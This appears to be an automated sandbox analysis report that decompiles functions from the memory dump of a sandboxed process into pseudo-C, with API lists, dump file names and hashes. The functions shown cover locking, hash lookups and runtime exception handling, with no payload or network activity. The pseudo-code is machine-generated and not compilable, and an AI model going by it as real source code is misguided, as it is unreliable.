				_t75 = _t74 ^ _t165;
				_v20 = _t74 ^ _t165;
				if( *_t156 == 0) {
					L2:
					_t113 = 0;
					L3:
					E00CFE643(_t75, _t113, _v20 ^ _t165, _t147, _t155, _t156);
					return _t113;
				}
				_t114 = __ecx;
				_t75 = E00CD7530(__ecx + 0x1ac);
				if(_t75 == 0) {
					L00CC6B10();
					__eflags = _t75 - _t155;
					if(_t75 != _t155) {
						L28:
						_t113 = 1;
						__eflags =  *_t156 & 0x00000008;
						if(( *_t156 & 0x00000008) != 0) {
							_t78 = _a12;
							__eflags = _t78;
							_t147 =  !=  ? _t78 : 0xd2fc87;
							_t75 = L00CE2E30(_a4 & 0x000000ff,  !=  ? _t78 : 0xd2fc87, _t78, _a4 & 0x000000ff, _t156, 0xd2fc87, _a16, _a20, _a28);
						}
						goto L3;
					}
					E00CD7770(_t147, __fp0);
					_t157 = E00CD7980();
					_t82 =  *0xd51584; // 0x0
					_t122 =  *0xd43e38; // 0x0
					_t123 =  *((intOrPtr*)( *[fs:0x2c] + _t122 * 4));
					__eflags = _t82 -  *((intOrPtr*)(_t123 + 4));
					if(_t82 >  *((intOrPtr*)(_t123 + 4))) {
						L00CFDC67(_t82, 0xd51584);
						_t166 = _t166 + 4;
						__eflags =  *0xd51584 - 0xffffffff;
						if( *0xd51584 == 0xffffffff) {
							_push(8);
							_t109 = L00CFDBBC();
							_v44 = _t109;
							 *((intOrPtr*)(_t109 + 4)) = 0;
							 *_t109 = 0;
							E00CD75A0(_t109, 0);
							 *0xd51580 = _v44;
							L00CFDCDD(0xd51584);
							_t166 = _t166 + 8;
						}
					}
					_t124 =  *0xd51580; // 0x0
					_t75 = E00CD7530(_t124);
					__eflags = _t157;
					_t147 = _t157;
					_t156 = _a8;
					if(_t157 == 0) {
						goto L28;
					} else {
						__eflags = _t147 - _t75;
						if(_t147 == _t75) {
							goto L28;
						}
						__eflags =  *_t147;
						if( *_t147 == 0) {
							goto L28;
						}
						_t125 =  *0xd51580; // 0x0
						_v48 = _t147;
						E00CD7560(_t125, _t147);
						_t10 = _t114 + 8; // 0x8
						_t85 = _t10;
						_v56 = _t85;
						__imp__TryAcquireSRWLockExclusive(_t85);
						__eflags = _t85;
						if(__eflags == 0) {
							L00CC8CF0(_t114, _v56, _t147, __eflags, _t173);
						}
						_t87 =  *(_t114 + 0x98);
						_t115 = _t114 + 0x94;
						__eflags = _t87;
						if(_t87 == 0) {
							L26:
							_v28 =  &_a24;
							_t147 =  &_v24;
							_t155 =  &_v28;
							_push( &_v24);
							L00CCFD80(_t115, _t173,  &_v40,  &_a24, 0xd36193,  &_v28);
							__eflags = _v40 + 0xc;
							_t75 = E00CB4920(_v40 + 0xc, _t173, _v48);
							goto L27;
						} else {
							_t150 = _t87;
							_t160 = (((_t87 - (_t150 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t87 - (_t150 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t87 - (_t150 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t87 - (_t150 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
							__eflags = _t160 - 1;
							if(_t160 > 1) {
								_t139 = _t155;
								__eflags = _t150 - _t155;
								if(_t150 <= _t155) {
									_t144 = _t150;
									_t15 = _t155 % _t144;
									__eflags = _t15;
									_t150 = _t144;
									_t139 = _t15;
								}
							} else {
								_t139 = _t150 - 0x00000001 & _t155;
							}
							_v44 = _t139;
							_t95 =  *( *_t115 + _t139 * 4);
							__eflags = _t95;
							if(_t95 == 0) {
								goto L26;
							}
							_t140 =  *_t95;
							__eflags = _t140;
							if(_t140 == 0) {
								goto L26;
							}
							_v52 = _t150 - 1;
							_v60 = _t160;
							do {
								_t97 =  *(_t140 + 4);
								__eflags = _t97 - _t155;
								if(_t97 == _t155) {
									__eflags =  *((intOrPtr*)(_t140 + 8)) - _t155;
									if( *((intOrPtr*)(_t140 + 8)) == _t155) {
										_v40 = 0xffffffff;
										_v36 = 0xffffffff;
										_v32 = 0xffffffff;
										_t52 = _t140 + 0xc; // 0xc
										_t161 = _t52;
										_t98 =  *(_t140 + 0x17) & 0x000000ff;
										_t147 = _t161;
										__eflags = _t98;
										if(_t98 < 0) {
											_t147 =  *(_t140 + 0xc);
											_t98 =  *(_t140 + 0x10);
										}
										E00CD4560(_t115, _t147, _t155, _t161, _t173,  &_v40, _t147, _t98, 0xd307e5, 1, 0, 1);
										_t166 = _t166 + 0x1c;
										_t155 = _v40;
										_t100 = _v36;
										__eflags = _t155 - _t100;
										if(_t155 == _t100) {
											L40:
											_push(_v48);
											E00CB513A(_t115, _t161, _t173);
											_t75 = _v40;
											_v44 = _v40;
											goto L41;
										} else {
											_v52 = _t161;
											_t163 = _t100;
											_t102 = E00D131A0(_v48);
											_t166 = _t166 + 4;
											_t115 = _t102;
											_t75 = _t163;
											_v44 = _t155;
											do {
												__eflags =  *((intOrPtr*)(_t155 + 4)) - _t115;
												if( *((intOrPtr*)(_t155 + 4)) != _t115) {
													goto L34;
												}
												__eflags = _t115;
												if(_t115 == 0) {
													L38:
													__eflags = _t155 - _t75;
													if(_t155 != _t75) {
														L41:
														_t162 = _v44;
														__eflags = _t162;
														if(_t162 != 0) {
															_v36 = _t162;
															_t75 = L00CFDBEC(_t162);
															_t166 = _t166 + 4;
														}
														L27:
														_t156 = _a8;
														__imp__ReleaseSRWLockExclusive(_v56);
														goto L28;
													}
													break;
												}
												_t104 = L00CFFD0D( *_t155, _v48, _t115);
												_t166 = _t166 + 0xc;
												__eflags = _t104;
												_t75 = _t163;
												if(_t104 != 0) {
													goto L34;
												}
												goto L38;
												L34:
												_t155 = _t155 + 8;
												__eflags = _t155 - _t75;
											} while (_t155 != _t75);
											_t161 = _v52;
											L00CB4FB4(_v52, _t173, 0x2c);
											goto L40;
										}
									}
									goto L19;
								}
								__eflags = _t160 - 1;
								if(_t160 > 1) {
									__eflags = _t97 - _t150;
									if(_t97 >= _t150) {
										_t164 = _t150;
										_t28 = _t97 % _t164;
										__eflags = _t28;
										_t97 = _t28;
										_t150 = _t164;
										_t160 = _v60;
									}
								} else {
									_t97 = _t97 & _v52;
								}
								__eflags = _t97 - _v44;
								if(_t97 != _v44) {
									goto L26;
								}
								L19:
								_t140 =  *_t140;
								__eflags = _t140;
							} while (_t140 != 0);
							goto L26;
						}
					}
				}
				goto L2;
			}

0x00ccd9c0
0x00ccd9c0
0x00ccd9c9
0x00ccd9cc
0x00ccd9cf
0x00ccd9d4
0x00ccd9d6
0x00ccd9dc
0x00ccd9ef
0x00ccd9ef
0x00ccd9f1
0x00ccd9f6
0x00ccda04
0x00ccda04
0x00ccd9de
0x00ccd9e6
0x00ccd9ed
0x00ccda07
0x00ccda0c
0x00ccda0e
0x00ccdb86
0x00ccdb86
0x00ccdb88
0x00ccdb8b
0x00ccdb91
0x00ccdb98
0x00ccdb9f
0x00ccdbb1
0x00ccdbb6
0x00000000
0x00ccdb8b
0x00ccda14
0x00ccda20
0x00ccda22
0x00ccda27
0x00ccda34
0x00ccda37
0x00ccda3d
0x00ccdc94
0x00ccdc99
0x00ccdc9c
0x00ccdca3
0x00ccdca9
0x00ccdcab
0x00ccdcb3
0x00ccdcb6
0x00ccdcbd
0x00ccdcc7
0x00ccdccf
0x00ccdcd9
0x00ccdcde
0x00ccdcde
0x00ccdca3
0x00ccda43
0x00ccda49
0x00ccda4e
0x00ccda50
0x00ccda52
0x00ccda55
0x00000000
0x00ccda5b
0x00ccda5b
0x00ccda5d
0x00000000
0x00000000
0x00ccda63
0x00ccda66
0x00000000
0x00000000
0x00ccda6c
0x00ccda72
0x00ccda76
0x00ccda7b
0x00ccda7b
0x00ccda7e
0x00ccda82
0x00ccda88
0x00ccda8a
0x00ccdc85
0x00ccdc85
0x00ccda90
0x00ccda96
0x00ccda9c
0x00ccda9e
0x00ccdb4d
0x00ccdb50
0x00ccdb53
0x00ccdb56
0x00ccdb5e
0x00ccdb67
0x00ccdb6f
0x00ccdb75
0x00000000
0x00ccdaa4
0x00ccdaa4
0x00ccdad7
0x00ccdada
0x00ccdadd
0x00ccdae6
0x00ccdae8
0x00ccdaea
0x00ccdaee
0x00ccdaf2
0x00ccdaf2
0x00ccdaf6
0x00ccdaf8
0x00ccdaf8
0x00ccdadf
0x00ccdae2
0x00ccdae2
0x00ccdafc
0x00ccdaff
0x00ccdb02
0x00ccdb04
0x00000000
0x00000000
0x00ccdb06
0x00ccdb08
0x00ccdb0a
0x00000000
0x00000000
0x00ccdb0f
0x00ccdb12
0x00ccdb26
0x00ccdb26
0x00ccdb29
0x00ccdb2b
0x00ccdb17
0x00ccdb1a
0x00ccdbbe
0x00ccdbc5
0x00ccdbcc
0x00ccdbd3
0x00ccdbd3
0x00ccdbd6
0x00ccdbda
0x00ccdbdc
0x00ccdbde
0x00ccdbe0
0x00ccdbe3
0x00ccdbe3
0x00ccdbf7
0x00ccdbfc
0x00ccdbff
0x00ccdc02
0x00ccdc05
0x00ccdc07
0x00ccdc56
0x00ccdc58
0x00ccdc5b
0x00ccdc60
0x00ccdc63
0x00000000
0x00ccdc09
0x00ccdc09
0x00ccdc0f
0x00ccdc11
0x00ccdc16
0x00ccdc19
0x00ccdc1b
0x00ccdc1d
0x00ccdc29
0x00ccdc29
0x00ccdc2c
0x00000000
0x00000000
0x00ccdc2e
0x00ccdc30
0x00ccdc46
0x00ccdc46
0x00ccdc48
0x00ccdc66
0x00ccdc66
0x00ccdc69
0x00ccdc6b
0x00ccdc71
0x00ccdc75
0x00ccdc7a
0x00ccdc7a
0x00ccdb7a
0x00ccdb7a
0x00ccdb80
0x00000000
0x00ccdb80
0x00000000
0x00ccdc48
0x00ccdc38
0x00ccdc3d
0x00ccdc40
0x00ccdc42
0x00ccdc44
0x00000000
0x00000000
0x00000000
0x00ccdc22
0x00ccdc22
0x00ccdc25
0x00ccdc25
0x00ccdc4a
0x00ccdc51
0x00000000
0x00ccdc51
0x00ccdc07
0x00000000
0x00ccdb1a
0x00ccdb2d
0x00ccdb30
0x00ccdb37
0x00ccdb39
0x00ccdb3b
0x00ccdb3f
0x00ccdb3f
0x00ccdb41
0x00ccdb43
0x00ccdb45
0x00ccdb45
0x00ccdb32
0x00ccdb32
0x00ccdb32
0x00ccdb48
0x00ccdb4b
0x00000000
0x00000000
0x00ccdb20
0x00ccdb20
0x00ccdb22
0x00ccdb22
0x00000000
0x00ccdb26
0x00ccda9e
0x00ccda55
0x00000000

APIs

Part of subcall function 00CD7530: TlsGetValue.KERNEL32(?,?,?,00CDD0B3,?,?,00000000,?,00CC9DF6,?,?,00000000,?,00000000), ref: 00CD753D

TryAcquireSRWLockExclusive.KERNEL32(00000008,00000000,?,00D41C78,00000000,?,00CC743D,00000000,?,00D41C78,?,?,00000000,00000000), ref: 00CCDA82
ReleaseSRWLockExclusive.KERNEL32(00D41C78,00D41C78,?,00000000,00D36193,?,00D41C78,?,00D41C78,00000000,?,00CC743D,00000000,?,00D41C78,?), ref: 00CCDB80
_strlen.LIBCMT ref: 00CCDC11
__Init_thread_header.LIBCMT ref: 00CCDC94

Part of subcall function 00CFDC67: EnterCriticalSection.KERNEL32(00D43DF0,?,?,?,00CD5D50,00D53ED0,?,?,?,?,00CD5B17,00000000,00000000), ref: 00CFDC72
Part of subcall function 00CFDC67: LeaveCriticalSection.KERNEL32(00D43DF0,?,?,?,00CD5D50,00D53ED0,?,?,?,?,00CD5B17,00000000,00000000), ref: 00CFDCAF

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: CriticalExclusiveLockSection$AcquireEnterInit_thread_headerLeaveReleaseValue_strlen
String ID:
API String ID: 442802925-0
Opcode ID: 387e8ae79b377b1e18a3c06762da750c2c93f5b8e7ecf36e50a9415d8a118caa
Instruction ID: 095dc8c60aa4af4495f2219117148f2b574cf4b1b7a950a992692ce64641180e
Opcode Fuzzy Hash: 387e8ae79b377b1e18a3c06762da750c2c93f5b8e7ecf36e50a9415d8a118caa
Instruction Fuzzy Hash: FA91B271E002099BDF14DF68D891FAEB7B2AB84320F19813DE916A7341EB719D41DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CCBAD0 Relevance: 6.2, APIs: 4, Instructions: 227
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00CCBAD0(intOrPtr __ebx, signed int __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4) {
				void* _v16;
				signed int _v24;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _t70;
				signed int _t71;
				signed int _t73;
				signed int _t94;
				signed int _t95;
				intOrPtr _t102;
				signed int _t115;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t140;
				intOrPtr _t144;
				signed int _t153;
				signed int _t155;
				void* _t160;
				signed int _t162;
				signed int _t164;
				intOrPtr _t165;
				signed int _t170;
				signed int _t174;
				void* _t176;

				_t198 = __fp0;
				_t110 = __ebx;
				_t170 = _t174;
				_push(__ebx);
				_t176 = (_t174 & 0xfffffff8) - 0x20;
				_t162 = __ecx;
				_t70 =  *0xd40014; // 0xfbddd969
				_t71 = _t70 ^ _t170;
				_v24 = _t71;
				_t119 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t119 == 0) {
					L11:
					_t73 =  *((intOrPtr*)(_t162 + 8)) + 4;
					_v40 = _t73;
					__imp__TryAcquireSRWLockExclusive(_t73);
					if(_t73 == 0) {
						L00CC8CF0(_t110, _v44, _t143, __eflags, _t198);
					}
					_v40 = _t162;
					 *0xd57000();
					_t164 = _v40;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t162 + 8)) + 0x14)))) + 4))))( &_v36, _v40 + 0x10);
					_v44 = 0;
					_t112 =  *((intOrPtr*)(_t164 + 0xc));
					 *((intOrPtr*)(_t164 + 0xc)) = _v44;
					if( *((intOrPtr*)(_t164 + 0xc)) != 0) {
						L00CE0C60(_t112);
						L00CFDBEC(_t112);
						_t176 = _t176 + 4;
						_t116 = _v44;
						_v44 = 0;
						if(_v44 != 0) {
							L00CE0C60(_t116);
							L00CFDBEC(_t116);
							_t176 = _t176 + 4;
						}
					}
					_t165 =  *((intOrPtr*)(_t164 + 8));
					_t113 =  *( *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x14)))) + 0xc);
					 *0xd57000();
					if( *( *( *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x14)))) + 0xc))() == 0) {
						L23:
						__imp__ReleaseSRWLockExclusive(_v52);
						_t162 = _v52;
						_t119 =  *((intOrPtr*)(_t162 + 0xc));
						if( *((intOrPtr*)(_t162 + 0xc)) == 0) {
							_t153 = 0;
							__eflags = 0;
						} else {
							goto L24;
						}
						goto L28;
					} else {
						if(( *(_t165 + 0xd0) |  *(_t165 + 0xd4)) != 0) {
							L22:
							_t84 = L00CCCE20(_t165, _t198, 1);
							goto L23;
						} else {
							E00CC9710( &_v44);
							_t129 =  *(_t165 + 0xe8);
							_v56 = _t165;
							_t94 =  *(_t165 + 0xec);
							asm("adc esi, 0x7fffffff");
							_t147 = _t129 + 1;
							asm("adc esi, 0x0");
							_t115 = _v44;
							asm("sbb esi, 0x0");
							_t155 = _v40;
							if(_t129 + 1 >= 2) {
								_t113 = _t115 - _t129;
								asm("sbb edi, eax");
								_t95 = _t94 & 0xffffff00 | __eflags > 0x00000000;
								_t131 = _t155 >> 0x1f;
								__eflags = _t95;
								_t132 =  ==  ? _t115 - _t129 : _t131;
								__eflags = _t95;
								_t143 =  ==  ? _t155 : _t131 - 0x80000000;
								__eflags = _t143;
								goto L21;
							} else {
								_t113 = _t115 ^ _t129;
								if((_t155 ^ _t94 | _t115 ^ _t129) == 0) {
									asm("int3");
									asm("ud2");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									__eflags = _t129;
									if(__eflags != 0) {
										_push(_t170);
										return E00CCF430(_t129, _t147, __eflags, _t198, 1);
									}
									return _t94;
								} else {
									asm("adc edx, 0x0");
									_t132 =  <  ? 0xffffffff : 0;
									_t143 =  <  ? 0x7fffffff : 0x7fffffff;
									L21:
									_t165 = _v56;
									 *(_t165 + 0xd0) = _t132;
									 *(_t165 + 0xd4) = _t143;
									goto L22;
								}
							}
						}
					}
				} else {
					if( *_t119 != 0x40) {
						L24:
						_t113 = _a4;
						_v48 = 0xffffffff;
						_t153 = L00CE0F50(_t119,  &_v48);
						if(_t113 != 0 && _t153 != 0) {
							_t144 =  *((intOrPtr*)(_t162 + 0xc));
							_t143 =  *(_t144 + 0x1e08);
							 *_t113 =  *(_t144 + 0x1e08);
							_t84 = _v48 << 0x0000001a |  *(_t162 + 0x10) & 0x0000ffff;
							 *(_t113 + 4) = _v48 << 0x0000001a |  *(_t162 + 0x10) & 0x0000ffff;
						}
						L28:
						E00CFE643(_t84, _t113, _v40 ^ _t170, _t143, _t153, _t162);
						return _t153;
					} else {
						_t160 =  *((intOrPtr*)(__ecx + 8)) + 4;
						__imp__TryAcquireSRWLockExclusive(_t160);
						if(_t71 == 0) {
							L00CC8CF0(__ebx, _t160, _t143, __eflags, __fp0);
						}
						_t110 =  *((intOrPtr*)(_t162 + 0xc));
						if(_t110 == 0) {
							 *((intOrPtr*)(_t162 + 0xc)) = 0;
						} else {
							_t102 =  *((intOrPtr*)(_t162 + 8));
							if( *((intOrPtr*)(_t102 + 0x1e4)) !=  *((intOrPtr*)(_t162 + 0x14))) {
								 *((intOrPtr*)(_t162 + 0xc)) = 0;
								goto L9;
							} else {
								_t140 =  *(_t102 + 0x14);
								_v48 = _t140;
								 *((intOrPtr*)(_t162 + 0xc)) = 0;
								_v36 = _t110;
								_v44 =  *(_t162 + 0x10);
								 *0xd57000();
								 *((intOrPtr*)( *((intOrPtr*)( *_t140 + 8))))(_v44, _v36);
								_t110 =  *((intOrPtr*)(_t162 + 0xc));
								 *((intOrPtr*)(_t162 + 0xc)) = 0;
								if( *((intOrPtr*)(_t162 + 0xc)) != 0) {
									L9:
									L00CE0C60(_t110);
									L00CFDBEC(_t110);
									_t176 = _t176 + 4;
								} else {
								}
							}
						}
						__imp__ReleaseSRWLockExclusive(_t160);
						_t119 =  *((intOrPtr*)(_t162 + 0xc));
						if( *((intOrPtr*)(_t162 + 0xc)) != 0) {
							goto L24;
						} else {
							goto L11;
						}
					}
				}
			}

0x00ccbad0
0x00ccbad0
0x00ccbad1
0x00ccbad3
0x00ccbad9
0x00ccbadc
0x00ccbade
0x00ccbae3
0x00ccbae5
0x00ccbae9
0x00ccbaee
0x00ccbb9e
0x00ccbba1
0x00ccbba4
0x00ccbba9
0x00ccbbb1
0x00ccbd6d
0x00ccbd6d
0x00ccbbbd
0x00ccbbcf
0x00ccbbdc
0x00ccbbe1
0x00ccbbe7
0x00ccbbef
0x00ccbbf2
0x00ccbbf7
0x00ccbbfb
0x00ccbc01
0x00ccbc06
0x00ccbc09
0x00ccbc0d
0x00ccbc17
0x00ccbc1b
0x00ccbc21
0x00ccbc26
0x00ccbc26
0x00ccbc17
0x00ccbc29
0x00ccbc31
0x00ccbc36
0x00ccbc42
0x00ccbcff
0x00ccbd03
0x00ccbd09
0x00ccbd0d
0x00ccbd12
0x00ccbd50
0x00ccbd50
0x00000000
0x00000000
0x00000000
0x00000000
0x00ccbc48
0x00ccbc54
0x00ccbcf6
0x00ccbcfa
0x00000000
0x00ccbc5a
0x00ccbc5f
0x00ccbc67
0x00ccbc6d
0x00ccbc71
0x00ccbc7e
0x00ccbc84
0x00ccbc87
0x00ccbc8d
0x00ccbc91
0x00ccbc94
0x00ccbc98
0x00ccbcca
0x00ccbccc
0x00ccbcce
0x00ccbcd3
0x00ccbcdc
0x00ccbcde
0x00ccbce1
0x00ccbce3
0x00ccbce3
0x00000000
0x00ccbc9a
0x00ccbc9a
0x00ccbca0
0x00ccbd83
0x00ccbd84
0x00ccbd86
0x00ccbd87
0x00ccbd88
0x00ccbd89
0x00ccbd8a
0x00ccbd8b
0x00ccbd8c
0x00ccbd8d
0x00ccbd8e
0x00ccbd8f
0x00ccbd90
0x00ccbd92
0x00ccbd94
0x00000000
0x00ccbd9e
0x00ccbd9f
0x00ccbca6
0x00ccbcbd
0x00ccbcc2
0x00ccbcc5
0x00ccbce6
0x00ccbce6
0x00ccbcea
0x00ccbcf0
0x00000000
0x00ccbcf0
0x00ccbca0
0x00ccbc98
0x00ccbc54
0x00ccbaf4
0x00ccbaf7
0x00ccbd14
0x00ccbd14
0x00ccbd17
0x00ccbd29
0x00ccbd2d
0x00ccbd3b
0x00ccbd3e
0x00ccbd44
0x00ccbd49
0x00ccbd4b
0x00ccbd4b
0x00ccbd52
0x00ccbd58
0x00ccbd66
0x00ccbafd
0x00ccbb00
0x00ccbb04
0x00ccbb0c
0x00ccbd79
0x00ccbd79
0x00ccbb12
0x00ccbb17
0x00ccbb6c
0x00ccbb19
0x00ccbb19
0x00ccbb25
0x00ccbb75
0x00000000
0x00ccbb27
0x00ccbb27
0x00ccbb2a
0x00ccbb2e
0x00ccbb35
0x00ccbb3c
0x00ccbb47
0x00ccbb5a
0x00ccbb5c
0x00ccbb5f
0x00ccbb68
0x00ccbb7c
0x00ccbb7e
0x00ccbb84
0x00ccbb89
0x00000000
0x00ccbb6a
0x00ccbb68
0x00ccbb25
0x00ccbb8d
0x00ccbb93
0x00ccbb98
0x00000000
0x00000000
0x00000000
0x00000000
0x00ccbb98
0x00ccbaf7

APIs

TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00CCBB04
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CCBB8D
TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00CCBBA9
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CCBD03

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID:
API String ID: 17069307-0
Opcode ID: cd41b0424601b0bf0f1c785e8c96f7b07418918f522331cbe960e03c2cd00c63
Instruction ID: 049d8c11d803ec64efd49a2c065ee442343b00fe2a0cfc47ef97397549ab3df3
Opcode Fuzzy Hash: cd41b0424601b0bf0f1c785e8c96f7b07418918f522331cbe960e03c2cd00c63
Instruction Fuzzy Hash: FE817C716043018FDB14DFA5C491B2BB7E6BF88320F14892DE9AA97391DB70EC09CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00D143ED Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E00D143ED(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0xd3f330);
				E00CFE5F0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												L00D00C20(_t107, E00CFF4BD(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											L00D00C20(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0xd4420c; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0xd57000();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00D0E930(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0xd3f350);
									E00CFE5F0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00D143ED(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = L00CFEE8F(_t103, _t108[0x18], E00CFF4BD( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = L00CFEE9F(_t103, _t108[0x18], E00CFF4BD( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00CFF4BD();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00d143ed
0x00d143ef
0x00d143f4
0x00d143f9
0x00d143fb
0x00d143fe
0x00d14403
0x00d14513
0x00d14513
0x00d14513
0x00000000
0x00d14412
0x00d14412
0x00d14417
0x00d14421
0x00d14423
0x00d14428
0x00d1442d
0x00d1442d
0x00d1442f
0x00d14432
0x00d14437
0x00d14459
0x00d14459
0x00d1445c
0x00d1445f
0x00d1447d
0x00d14480
0x00d144bf
0x00d144c2
0x00d144c5
0x00d144ea
